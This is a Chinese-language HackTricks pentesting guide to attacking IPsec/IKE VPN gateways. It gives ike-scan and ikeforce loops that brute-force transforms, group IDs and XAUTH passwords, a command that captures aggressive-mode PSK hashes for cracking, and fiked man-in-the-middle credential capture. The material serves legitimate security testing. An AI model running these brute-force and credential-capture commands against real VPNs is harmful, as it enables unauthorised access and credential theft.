hacktricks/network-services-pentesting/ipsec-ike-vpn-pentesting.md

17 KiB
Raw Blame History

500/udp - 渗透测试 IPsec/IKE VPN

从零开始学习 AWS 黑客技术,成为专家 htARTEHackTricks AWS 红队专家)

支持 HackTricks 的其他方式:

发现最重要的漏洞以便更快修复。Intruder 跟踪您的攻击面,运行主动威胁扫描,发现整个技术堆栈中的问题,从 API 到 Web 应用程序和云系统。立即免费试用

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}


基本信息

IPsec 被广泛认可为用于保护网络之间通信LAN 到 LAN以及从远程用户到网络网关远程访问的主要技术是企业 VPN 解决方案的支柱。

通过 IKE 管理两个点之间的 安全关联SA 的建立IKE 在 ISAKMP 的框架下运行,这是一种专为身份验证和密钥交换而设计的协议。这个过程分为几个阶段:

  • 第 1 阶段: 在两个端点之间创建一个安全通道。通过使用预共享密钥PSK或证书来实现可以使用主模式涉及三对消息主动模式
  • 第 1.5 阶段: 虽然不是强制的,这个阶段称为扩展认证阶段,通过要求用户名和密码来验证尝试连接的用户的身份。
  • 第 2 阶段: 该阶段专门用于协商使用 ESPAH 来保护数据的参数。它允许使用与第 1 阶段不同的算法来确保 完美前向保密性PFS,增强安全性。

默认端口: 500/udp

使用 nmap 发现 该服务

root@bt:~# nmap -sU -p 500 172.16.21.200
Starting Nmap 5.51 (http://nmap.org) at 2011-11-26 10:56 IST
Nmap scan report for 172.16.21.200
Host is up (0.00036s latency).
PORT    STATE SERVICE
500/udp open  isakmp
MAC Address: 00:1B:D5:54:4D:E4 (Cisco Systems)

查找有效的转换

IPSec配置可能只准备接受一个或几个转换。一个转换是一组值。每个转换包含一些属性如DES或3DES作为加密算法SHA或MD5作为完整性算法,预共享密钥作为认证类型Diffie-Hellman 1或2作为密钥分发算法以及28800秒作为生存周期

因此,你首先要做的是找到一个有效的转换,这样服务器就会与你通信。为此,你可以使用工具ike-scan。默认情况下Ike-scan在主模式下工作并向网关发送一个带有ISAKMP头和一个包含八个转换的提议的数据包。

根据响应,你可以获取有关端点的一些信息:

root@bt:~# ike-scan -M 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200    Main Mode Handshake returned
HDR=(CKY-R=d90bf054d6b76401)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)

Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify

正如您在前面的回复中所看到的,有一个名为AUTH的字段,其值为PSK。这意味着VPN是使用预共享密钥配置的这对于渗透测试人员来说非常有用

最后一行的值也非常重要:

  • 0 returned handshake; 0 returned notify: 这意味着目标不是IPsec网关
  • 1 returned handshake; 0 returned notify: 这意味着目标已配置为IPsec并愿意执行IKE协商并且您提出的一个或多个变换是可接受的(有效的变换将显示在输出中)。
  • 0 returned handshake; 1 returned notify: VPN网关在没有任何变换可接受时会响应通知消息(尽管有些网关不会这样做,在这种情况下,应尝试进一步分析和修改提议)。

因此在这种情况下我们已经有一个有效的变换但如果您处于第3种情况则需要稍微进行暴力破解以找到有效的变换

首先,您需要创建所有可能的变换:

for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do for HASH in 1 2 3 4 5 6; do for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do echo "--trans=$ENC,$HASH,$AUTH,$GROUP" >> ike-dict.txt ;done ;done ;done ;done

然后使用ike-scan对每个进行暴力破解这可能需要几分钟

while read line; do (echo "Valid trans found: $line" && sudo ike-scan -M $line <IP>) | grep -B14 "1 returned handshake" | grep "Valid trans found" ; done < ike-dict.txt

如果暴力破解没有成功,也许服务器甚至对有效的转换也没有握手响应。那么,您可以尝试使用侵略模式进行相同的暴力破解:

while read line; do (echo "Valid trans found: $line" && ike-scan -M --aggressive -P handshake.txt $line <IP>) | grep -B7 "SA=" | grep "Valid trans found" ; done < ike-dict.txt

希望有效的转换被回显
您可以尝试使用iker.py进行相同的攻击
您还可以尝试使用ikeforce来暴力破解转换:

./ikeforce.py <IP> # No parameters are required for scan -h for additional help

DH Group: 14 = 2048-bit MODP15 = 3072-bit
2 = HMAC-SHA = SHA1在这种情况下--trans格式为$Enc,$Hash,$Auth,$DH

思科建议避免使用DH组1和2因为它们不够强大。专家认为资源丰富的国家可以轻松破解使用这些弱组的数据的加密。这是通过使用一种特殊方法来准备快速破解代码来实现的。尽管设置这种方法需要花费大量资金但如果数据使用的是不够强大的组如1,024位或更小这些强大的国家可以实时读取加密数据。

服务器指纹识别

然后您可以使用ike-scan尝试发现设备的供应商。该工具发送初始提议并停止重播。然后,它将分析从服务器接收的消息与匹配响应模式之间的时间差异渗透测试人员可以成功识别VPN网关供应商。此外一些VPN服务器将使用带有IKE的可选供应商IDVID负载

如有需要,请指定有效的转换(使用--trans

如果IKE发现供应商它将打印出来

root@bt:~# ike-scan -M --showbackoff 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200    Main Mode Handshake returned
HDR=(CKY-R=4f3ec84731e2214a)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)

IKE Backoff Patterns:

IP Address       No.  Recv time            Delta Time
172.16.21.200    1    1322286031.744904    0.000000
172.16.21.200    2    1322286039.745081    8.000177
172.16.21.200    3    1322286047.745989    8.000908
172.16.21.200    4    1322286055.746972    8.000983
172.16.21.200    Implementation guess: Cisco VPN Concentrator

Ending ike-scan 1.9: 1 hosts scanned in 84.080 seconds (0.01 hosts/sec). 1 returned handshake; 0 returned notify

这也可以通过 nmap 脚本 ike-version 实现

查找正确的 ID组名

为了被允许捕获哈希值,您需要一个支持主动模式和正确 ID组名的有效转换。您可能不知道有效的组名因此您将不得不使用暴力破解方法。
为此,我建议您使用 2 种方法:

使用 ike-scan 进行 ID 暴力破解

首先尝试使用虚假 ID 发出请求,尝试收集哈希值("-P":

ike-scan -P -M -A -n fakeID <IP>

如果没有返回哈希值,那么可能这种暴力破解方法会奏效。如果返回了某个哈希值这意味着将为一个虚假的ID发送一个虚假的哈希值因此这种方法不可靠用于暴力破解ID。例如可能会返回一个虚假的哈希值在现代版本中会发生

但是如我所说如果没有返回哈希值那么您应该尝试使用ike-scan来暴力破解常见的组名。

此脚本将尝试暴力破解可能的ID并将返回发生有效握手的ID这将是一个有效的组名

如果您发现了特定的转换请将其添加到ike-scan命令中。如果您发现了多个转换请随时添加一个新循环以尝试它们应该尝试它们所有直到其中一个正常工作为止

您可以使用ikeforce的字典seclists中的字典中的常见组名来进行暴力破解:

while read line; do (echo "Found ID: $line" && sudo ike-scan -M -A -n $line <IP>) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt

使用 Iker 进行 ID 的暴力破解

iker.py 也使用 ike-scan 来暴力破解可能的组名。它遵循自己的方法来根据 ike-scan 的输出找到有效的 ID

使用 ikeforce 进行 ID 的暴力破解

ikeforce.py 是一个工具,也可以用来暴力破解 ID。该工具将尝试利用不同的漏洞,这些漏洞可以用来区分有效和无效的 ID(可能会有误报和漏报,这就是为什么我更喜欢在可能的情况下使用 ike-scan 方法)。

默认情况下,ikeforce 会在开始时发送一些随机的 ID 来检查服务器的行为,并确定要使用的策略。

  • 第一种方法是通过搜索思科系统的Dead Peer Detection DPD信息(只有在组名正确时服务器才会回复此信息)来暴力破解组名。
  • 可用的第二种方法检查每次尝试发送的响应数量,因为有时在使用正确的 ID 时会发送更多数据包。
  • 第三种方法是在响应错误的 ID 时搜索“INVALID-ID-INFORMATION”
  • 最后,如果服务器对检查没有任何回复,ikeforce 将尝试暴力破解服务器,并检查当发送正确的 ID 时服务器是否会回复一些数据包。
    显然,暴力破解 ID 的目的是在获得有效 ID 后获取PSK。然后,使用idPSK,您将需要暴力破解 XAUTH如果已启用

如果您发现了特定的转换,请将其添加到 ikeforce 命令中。如果您发现了多个转换,请随时添加一个新循环以尝试它们全部(您应该尝试全部直到其中一个正常工作为止)。

git clone https://github.com/SpiderLabs/ikeforce.git
pip install 'pyopenssl==17.2.0' #It is old and need this version of the library
./ikeforce.py <IP> -e -w ./wordlists/groupnames.dic

嗅探ID

(来自书籍网络安全评估:了解您的网络还可以通过嗅探VPN客户端和服务器之间的连接来获取有效的用户名因为包含客户端ID的第一个主动模式数据包是明文发送的

捕获和破解哈希

最后,如果您找到了一个有效的转换组名,并且允许主动模式,那么您可以非常容易地获取可破解的哈希值:

ike-scan -M -A -n <ID> --pskcrack=hash.txt <IP> #If aggressive mode is supported and you know the id, you can get the hash of the passwor

哈希将保存在 hash.txt 中。

您可以使用 psk-crackjohn(使用 ikescan2john.py)和 hashcat破解 这个哈希:

psk-crack -d <Wordlist_path> psk.txt

XAuth

Aggressive mode IKE结合预共享密钥PSK通常用于组认证目的。这种方法通过XAuth扩展认证进行增强,引入了额外的用户认证层。这种认证通常利用Microsoft Active DirectoryRADIUS或类似系统的服务。

转向IKEv2,观察到一个显著的变化,即EAP可扩展认证协议取代XAuth用于用户认证的目的。这种变化突显了安全通信协议中认证实践的演变。

本地网络中间人攻击以捕获凭据

因此您可以使用_fiked_捕获登录数据并查看是否有任何默认用户名您需要将IKE流量重定向到fiked以进行嗅探可以借助ARP欺骗完成更多信息。Fiked将充当VPN端点并捕获XAuth凭据

fiked -g <IP> -k testgroup:secretkey -l output.txt -d

使用 IPSec 尝试进行中间人攻击,并阻止所有流量访问端口 500如果 IPSec 隧道无法建立,可能会以明文形式发送流量。

使用 ikeforce 对 XAUTH 用户名和密码进行暴力破解

要对 XAUTH 进行暴力破解(当您知道有效的组名 idpsk 时),您可以使用一个用户名或用户名列表以及一个密码列表:

./ikeforce.py <IP> -b -i <group_id> -u <username> -k <PSK> -w <passwords.txt> [-s 1]

这样ikeforce 将尝试使用每个用户名:密码组合进行连接。

如果找到一个或多个有效的 transforms就像在之前的步骤中使用它们一样。

使用 IPSEC VPN 进行身份验证

在 Kali 中,VPNC 用于建立 IPsec 隧道。配置文件 必须位于目录 /etc/vpnc/ 中。您可以使用命令 vpnc 来启动这些配置文件。

以下命令和配置说明了使用 VPNC 建立 VPN 连接的过程:

root@system:~# cat > /etc/vpnc/samplevpn.conf << STOP
IPSec gateway [VPN_GATEWAY_IP]
IPSec ID [VPN_CONNECTION_ID]
IPSec secret [VPN_GROUP_SECRET]
IKE Authmode psk
Xauth username [VPN_USERNAME]
Xauth password [VPN_PASSWORD]
STOP
root@system:~# vpnc samplevpn
VPNC started in background (pid: [PID])...
root@system:~# ifconfig tun0

在这个设置中:

  • 用 VPN 网关的实际 IP 地址替换 [VPN_GATEWAY_IP]
  • 用 VPN 连接的标识符替换 [VPN_CONNECTION_ID]
  • 用 VPN 的组密码替换 [VPN_GROUP_SECRET]
  • 用 VPN 认证凭据替换 [VPN_USERNAME][VPN_PASSWORD]
  • [PID] 表示 vpnc 启动时将分配的进程 ID。

在配置 VPN 时,请确保使用实际安全值替换占位符。

参考资料

Shodan

  • port:500 IKE

找到最重要的漏洞以便更快地修复它们。Intruder 跟踪您的攻击面,运行主动威胁扫描,发现整个技术堆栈中的问题,从 API 到 Web 应用程序和云系统。立即免费试用 今天。

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}

从零开始学习 AWS 黑客技术,成为专家 htARTEHackTricks AWS 红队专家)

支持 HackTricks 的其他方式: